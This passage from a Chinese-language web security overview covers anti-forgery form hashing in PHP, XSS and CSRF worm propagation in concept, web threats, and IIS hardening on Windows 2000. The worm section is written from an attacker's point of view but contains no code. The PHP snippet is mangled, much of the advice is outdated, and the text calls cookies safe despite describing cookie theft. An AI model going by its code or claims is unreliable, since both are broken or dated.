)期時(shí)間：半小時(shí)＄my_hash=md5（＄_POST［time］.$key）;//正確的hash字符串if（$my_hash!=$_POST[hash］)//hash字符串不正確die（非法表單提交。);if(time()—＄_POST［time］＄expire)｛//表單已經(jīng)過(guò)期,生成新的時(shí)間戳和hash字符串，顯示表單讓用戶重新提交。（此處省略）//…。｝//表單驗(yàn)證通過(guò)，可以接受表單提交的數(shù)據(jù)，并進(jìn)行其它操作。六、Web蠕蟲(chóng)Web蠕蟲(chóng)主要包括：XSS蠕蟲(chóng)、CSRF蠕蟲(chóng)、Clickjacking蠕蟲(chóng)，這三類蠕蟲(chóng)都及具體的漏洞風(fēng)險(xiǎn)有關(guān)系，從名字上很好分。還有第四類文本蠕蟲(chóng)。蠕蟲(chóng)性質(zhì)：傳播性，病毒性為。什么是xss蠕蟲(chóng)蠕蟲(chóng)病毒,比如前幾年比較猖獗的熊貓燒香,還有最近Conficker蠕蟲(chóng)。這些蠕蟲(chóng)的特性都是具有自傳播，感染，變形等。最近流行的豬流感按照理論也算蠕蟲(chóng)病毒。而近年來(lái)由于ajax流行，web2。0的一些特性，使得web蠕蟲(chóng)流行。任何一個(gè)蠕蟲(chóng)都不無(wú)原緣無(wú)故發(fā)作的,比如熊貓燒香是利用掛馬，遠(yuǎn)程掃描等方式感染的，而這歸根結(jié)底還是系統(tǒng)有漏洞。那么web蠕蟲(chóng)的切入點(diǎn)就是web有漏洞了。從03年腳本入侵流行一來(lái),sql注射就是最流行的入侵方式，但是由于現(xiàn)在人們的安全意識(shí)的提高，sql漏洞越來(lái)越少，xss的漏洞就開(kāi)始凸顯出來(lái),而xss可以使我們嵌入任意我們需要的代碼，比如盜個(gè)cookie等，當(dāng)別人訪問(wèn)的時(shí)候會(huì)吧自己的發(fā)送到你指定的文件里去.一個(gè)xss蠕蟲(chóng)都有什么基本功能之前在說(shuō)熊貓燒香之類的蠕蟲(chóng)病毒已經(jīng)說(shuō)過(guò)了這個(gè)內(nèi)容，傳播感染和變形，而現(xiàn)在web蠕蟲(chóng)先不用發(fā)展那么高級(jí)，而我們只需要寫(xiě)出傳播和感染就行，至于變形,除非漏洞被過(guò)濾了我們還需要繞過(guò)那么就需要一定得變形，而這種變形一般不會(huì)影響我們寫(xiě)的蠕蟲(chóng)文件，會(huì)影響到調(diào)用蠕蟲(chóng)文件的代碼。CSRF蠕蟲(chóng)原理及XSS蠕蟲(chóng)基本類似，只是這里用到的是CSRF，攻擊代碼存在于攻擊者的頁(yè)面中，目標(biāo)網(wǎng)站傳播的內(nèi)容都包含攻擊者頁(yè)面URL，這樣才能有貨目標(biāo)網(wǎng)站上的被攻擊者打開(kāi)攻擊者頁(yè)面，然后出發(fā)CSRF，CSRF會(huì)據(jù)需跨域發(fā)布含攻擊者頁(yè)面URL的內(nèi)容進(jìn)行傳播。八、Web面臨的安全威脅來(lái)自網(wǎng)絡(luò)上的安全威脅及攻擊多種多樣，依照Web訪問(wèn)的結(jié)構(gòu)，可將其分類為對(duì)Web服務(wù)器的安全威脅、對(duì)Web客戶機(jī)的安全威脅和對(duì)通信信道的安全威脅三類。（一）對(duì)Web服務(wù)器的安全威脅對(duì)于Web服務(wù)器、服務(wù)器的操作系統(tǒng)、數(shù)據(jù)庫(kù)服務(wù)器都有可能存在漏洞，惡意用戶都有可能利用這些漏洞去獲得重要信息。Web服務(wù)器上的漏洞可以從以下幾方面考慮：1、在Web服務(wù)器上的機(jī)密文件或重要數(shù)據(jù),如存放用戶名、口令的文件放置在不安全區(qū)域，被入侵后很容易得到。2、在Web數(shù)據(jù)庫(kù)中，保存的有價(jià)值信息,如商業(yè)機(jī)密數(shù)據(jù)、用戶信息等，如果數(shù)據(jù)庫(kù)安全配置不當(dāng)，很容易泄密。3、Web服務(wù)器本身存在一些漏洞，能被黑客利用侵入到系統(tǒng),破壞一些重要的數(shù)據(jù),甚至造成系統(tǒng)癱瘓。4、程序員的有意或無(wú)意在系統(tǒng)中遺漏Bugs給非法黑客創(chuàng)造條件。用CGI腳本編寫(xiě)的程序中的自身漏洞。（二）對(duì)Web客戶機(jī)的安全威脅現(xiàn)在網(wǎng)頁(yè)中的活動(dòng)內(nèi)容已被廣泛應(yīng)用，活動(dòng)內(nèi)容的不安全性是造成客戶端的主要威脅。網(wǎng)頁(yè)的活動(dòng)內(nèi)容是指在靜態(tài)網(wǎng)頁(yè)中嵌入的對(duì)用戶透明的程序，它可以完成一些動(dòng)作,顯示動(dòng)態(tài)圖像、下載和播放音樂(lè)、視頻等。當(dāng)用戶使用瀏覽器查看帶有活動(dòng)內(nèi)容的網(wǎng)頁(yè)時(shí)，這些應(yīng)用程序會(huì)自動(dòng)下載并在客戶機(jī)上運(yùn)行,如果這些程序被惡意使用，可以竊取、改變或刪除客戶機(jī)上的信息。主要用到JavaApplet和ActiveX技術(shù)。JavaApplet使用Java語(yǔ)言開(kāi)發(fā)，隨頁(yè)面下載,Java使用沙盒根據(jù)安全模式所定義的規(guī)則來(lái)限制JavaApplet的活動(dòng),它不會(huì)訪問(wèn)系統(tǒng)中規(guī)定安全范圍之外的程序代碼。但事實(shí)上JavaApplet存在安全漏洞，可能被利用進(jìn)行破壞。ActiveX是微軟的一個(gè)控件技術(shù),它封裝由網(wǎng)頁(yè)設(shè)計(jì)者放在網(wǎng)頁(yè)中來(lái)執(zhí)行特定的任務(wù)的程序,可以由微軟支持的多種語(yǔ)言開(kāi)發(fā)但只能運(yùn)行在Windows平臺(tái)。ActiveX在安全性上不如JavaApplet,一旦下載,能像其他程序一樣執(zhí)行，訪問(wèn)包括操作系統(tǒng)代碼在內(nèi)的所有系統(tǒng)資源，這是非常危險(xiǎn)的。Cookie是Netscape公司開(kāi)發(fā)的，用來(lái)改善HTTP的無(wú)狀態(tài)性。無(wú)狀態(tài)的表現(xiàn)使得制造像購(gòu)物車這樣要在一定時(shí)間內(nèi)記住用戶動(dòng)作的東西很難。Cookie實(shí)際上是一段小消息，在瀏覽器第一次連接時(shí)由HTTP服務(wù)器送到瀏覽器端，以后瀏覽器每次連接都把這個(gè)Cookie的一個(gè)拷貝返回給Web服務(wù)器,服務(wù)器用這個(gè)Cookie來(lái)記憶用戶和維護(hù)一個(gè)跨多個(gè)頁(yè)面的過(guò)程影像。Cookie不能用來(lái)竊取關(guān)于用戶或用戶計(jì)算機(jī)系統(tǒng)的信息，它們只能在某種程度上存儲(chǔ)用戶的信息,如計(jì)算機(jī)名字、IP地址、瀏覽器名稱和訪問(wèn)的網(wǎng)頁(yè)的URL等。所以，Cookie是相對(duì)安全的。（三）對(duì)通信信道的安全威脅Internet是連接Web客戶機(jī)和服務(wù)器通信的信道,是不安全的.像Sniffer這樣的嗅探程序,可對(duì)信道進(jìn)行偵聽(tīng),竊取機(jī)密信息，存在著對(duì)保密性的安全威脅。未經(jīng)授權(quán)的用戶可以改變信道中的信息流傳輸內(nèi)容，造成對(duì)信息完整性的安全威脅。此外，還有像利用拒絕服務(wù)攻擊，向網(wǎng)站服務(wù)器發(fā)送大量請(qǐng)求造成主機(jī)無(wú)法及時(shí)響應(yīng)而癱瘓,或者發(fā)送大量的IP數(shù)據(jù)包來(lái)阻塞通信信道，使網(wǎng)絡(luò)的速度便緩慢。九、Web的安全防護(hù)技術(shù)（一)Web客戶端的安全防護(hù)Web客戶端的防護(hù)措施,重點(diǎn)對(duì)Web程序組件的安全進(jìn)行防護(hù)，嚴(yán)格限制從網(wǎng)絡(luò)上任意下載程序并在本地執(zhí)行。可以在瀏覽器進(jìn)行設(shè)置,如MicrosoftInternetExplorer的Internet選項(xiàng)的高級(jí)窗口中將Java相關(guān)選項(xiàng)關(guān)閉。在安全窗口中選擇自定義級(jí)別，將ActiveX組件的相關(guān)選項(xiàng)選為禁用。在隱私窗口中根據(jù)需要選擇Cookie的級(jí)別，也可以根據(jù)需要將c:\windows\cookie下的所有Cookie相關(guān)文件刪除.（二）通信信道的安全防護(hù)通信信道的防護(hù)措施,可在安全性要求較高的環(huán)境中，利用HTTPS協(xié)議替代HTTP協(xié)議。利用安全套接層協(xié)議SSL保證安全傳輸文件，SSL通過(guò)在客戶端瀏覽器軟件和Web服務(wù)器之間建立一條安全通信信道，實(shí)現(xiàn)信息在Internet中傳送的保密性和完整性.但SSL會(huì)造成Web服務(wù)器性能上的一些下降。（三）Web服務(wù)器端的安全防護(hù)限制在Web服務(wù)器中賬戶數(shù)量，對(duì)在Web服務(wù)器上建立的賬戶，在口令長(zhǎng)度及定期更改方面作出要求，防止被盜用.Web服務(wù)器本身會(huì)存在一些安全上的漏洞，需要及時(shí)進(jìn)行版本升級(jí)更新.盡量使EMAIL、數(shù)據(jù)庫(kù)等服務(wù)器及Web服務(wù)器分開(kāi)，去掉無(wú)關(guān)的網(wǎng)絡(luò)服務(wù)。在Web服務(wù)器上去掉一些不用的如SHELL之類的解釋器.定期查看服務(wù)器中的日志文件，分析一切可疑事件。設(shè)置好Web服務(wù)器上系統(tǒng)文件的權(quán)限和屬性。通過(guò)限制許可訪問(wèn)用戶IP或DNS。從CGI編程角度考慮安全.采用編譯語(yǔ)言比解釋語(yǔ)言會(huì)更安全些,并且CGI程序應(yīng)放在獨(dú)立于HTML存放目錄之外的CGI-BIN下等措施。十、Web服務(wù)器安全防護(hù)策略的應(yīng)用這里以目前應(yīng)用較多的Windows2000平臺(tái)和IIS的Web服務(wù)器為例簡(jiǎn)述Web服務(wù)器端安全防護(hù)的策略應(yīng)用（一）系統(tǒng)安裝的安全策略安裝Windows2000系統(tǒng)時(shí)不要安裝多余的服務(wù)和多余的協(xié)議，因?yàn)橛械姆?wù)存在有漏洞，多余的協(xié)議會(huì)占用資源.安裝Windows2000后一定要及時(shí)安裝補(bǔ)丁4程序（W2KSP4_CN.exe)，立刻安裝防病毒軟件。(二）系統(tǒng)安全策略的配置通過(guò)“本地安全策略”限制匿名訪問(wèn)本機(jī)用戶、限制遠(yuǎn)程用戶對(duì)光驅(qū)或軟驅(qū)的訪問(wèn)等.通過(guò)“組策略"限制遠(yuǎn)程用戶對(duì)Netmeeting的桌面共享、限制用戶執(zhí)行Windows安裝任務(wù)等安全策略配置。（三）IIS安全策略的應(yīng)用在配置Internet信息服務(wù)（IIS)時(shí)，不要使用默認(rèn)的Web站點(diǎn)，刪除默認(rèn)的虛擬目錄映射；建立新站點(diǎn)，并對(duì)主目錄權(quán)限進(jìn)行設(shè)置。一般情況下設(shè)置成站點(diǎn)管理員和Administrator兩個(gè)用戶可完全控制，其他用戶可以讀取文件。（四）審核日志策略的配置當(dāng)Windows2000出現(xiàn)問(wèn)題的時(shí)候，通過(guò)對(duì)系統(tǒng)日志的分析,可以了解故障發(fā)生前系統(tǒng)的運(yùn)行情況,作為判斷故障原因的根據(jù)。一般情況下需要對(duì)常用的用戶登錄日志，HTTP和FTP日志進(jìn)行配置。1、設(shè)置登錄審核日志審核事件分為成功事件和失敗事件.成功事件表示一個(gè)用戶成功地獲得了訪問(wèn)某種資源的權(quán)限,而失敗事件則表明用戶的嘗試失敗.2、設(shè)置HTTP審核日志通過(guò)“Internet服務(wù)管理器”選擇Web站點(diǎn)的